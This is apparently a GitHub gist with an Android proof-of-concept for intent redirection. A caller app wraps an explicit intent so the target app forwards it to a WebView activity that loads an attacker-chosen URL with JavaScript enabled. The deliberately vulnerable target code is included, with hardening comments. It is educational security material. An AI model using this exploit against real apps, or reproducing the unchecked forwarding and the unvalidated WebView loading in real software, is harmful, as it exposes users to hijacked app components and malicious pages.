
@adon90
Created September 5, 2020 21:46
package com.example.intentpoc;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
/**
 * Proof-of-concept caller used to demonstrate the intent-forwarding weakness in the
 * target app ({@code com.example.myapplication}).
 *
 * <p>It sends one explicit {@link Intent} to the target's {@code MainActivity} and places a
 * second explicit intent, addressed to the target's {@code SecondActivity}, inside it under
 * the extra key {@code extra_deep_link_intent}. The nested intent carries the string extra
 * {@code adon_uri}.
 *
 * <p>Reviewer note: the point for the receiving side is that a {@code Parcelable} intent
 * taken from an incoming extra is caller-controlled data. The target must validate it
 * before starting it, or not forward it at all.
 */
public class MainActivity extends AppCompatActivity {

    /**
     * Builds the nested and wrapping intents and starts the wrapping one.
     *
     * @param savedInstanceState saved state handed to the superclass unchanged
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // Nested intent: names SecondActivity explicitly and carries the URL string extra.
        Intent nestedIntent = new Intent()
                .setClassName("com.example.myapplication", "com.example.myapplication.SecondActivity")
                .putExtra("adon_uri", "https://hackplayers.com");

        // Wrapping intent: addressed to the target's MainActivity; the nested intent travels
        // as a Parcelable extra under the key that MainActivity reads.
        Intent wrappingIntent = new Intent()
                .setClassName("com.example.myapplication", "com.example.myapplication.MainActivity")
                .putExtra("extra_deep_link_intent", nestedIntent);

        startActivity(wrappingIntent);
    }
}

adon90 commented Sep 5, 2020

Vulnerable Code:

MainActivity.java:


/**
 * Entry activity of the target app, kept as the vulnerable example.
 *
 * <p>Weakness (intent redirection): each time the activity resumes, it reads the
 * {@code Parcelable} extra {@code extra_deep_link_intent} from the launching intent and
 * passes it to {@code startActivity} without inspecting it. The nested intent is therefore
 * started by this app rather than by the original caller. Whether that reaches components
 * the caller could not start directly depends on the manifest, which is not shown here.
 *
 * <p>Hardening: do not forward an intent received from another app. If forwarding is
 * required, resolve the nested intent's component and start it only when it is on an
 * explicit allow-list, and clear any URI-permission grant flags first (AndroidX
 * {@code IntentSanitizer} exists for this purpose). Keeping the forwarding activity
 * non-exported removes the external entry point.
 */
public class MainActivity extends AppCompatActivity {

    private WebView myWebView;

    /**
     * Sets the activity layout.
     *
     * @param savedInstanceState saved state handed to the superclass unchanged
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }

    /** Processes the launching intent's extras on every resume. */
    @Override
    protected void onResume() {
        super.onResume();
        handleIntentExtras(getIntent());
    }

    /**
     * Starts the intent embedded under {@code extra_deep_link_intent}, if one is present.
     *
     * @param intent the intent that launched this activity
     */
    private void handleIntentExtras(Intent intent) {
        final Intent embedded = intent.getParcelableExtra("extra_deep_link_intent");
        if (embedded == null) {
            return;
        }

        // UNSAFE: the embedded intent is caller-supplied and is started as-is. No check is
        // made on its target component, its flags or its extras.
        startActivity(embedded);
    }
}

SecondActivity.java



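/**
 * WebView host activity of the target app, kept as the vulnerable example.
 *
 * <p>It loads whatever string arrives in the {@code adon_uri} extra into a {@link WebView}
 * with JavaScript enabled. Combined with the unchecked intent forwarding in
 * {@code MainActivity}, the page shown inside the app is chosen by whoever supplied the
 * nested intent.
 *
 * <p>Hardening: parse the value and load it only when the scheme is {@code https} and the
 * host is on an allow-list owned by the app. Leave JavaScript disabled unless the loaded
 * content needs it.
 */
public class SecondActivity extends AppCompatActivity {

    private WebView myWebView;

    /**
     * Reads {@code adon_uri} from the launching intent and loads it in a new WebView.
     * Finishes immediately when the intent or the extra is missing.
     *
     * @param savedInstanceState saved state handed to the superclass unchanged
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_second);

        // Check the launching intent before reading from it. The original read the extra
        // first, so a null intent would have thrown before its own null check could run.
        if (getIntent() == null || !getIntent().hasExtra("adon_uri")) {
            finish();
            return;
        }

        // getStringExtra returns null when the extra is present but is not a String.
        String uri = getIntent().getStringExtra("adon_uri");
        if (uri == null) {
            finish();
            return;
        }

        myWebView = new WebView(this);
        myWebView.getSettings().setJavaScriptEnabled(true);

        // NOTE(security): uri is untrusted input and is loaded without any scheme or host
        // validation. This is left unchanged because the listing is the vulnerable example;
        // see the class comment for the allow-list check a real app needs here.
        myWebView.loadUrl(uri);
        setContentView(myWebView);
    }
}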
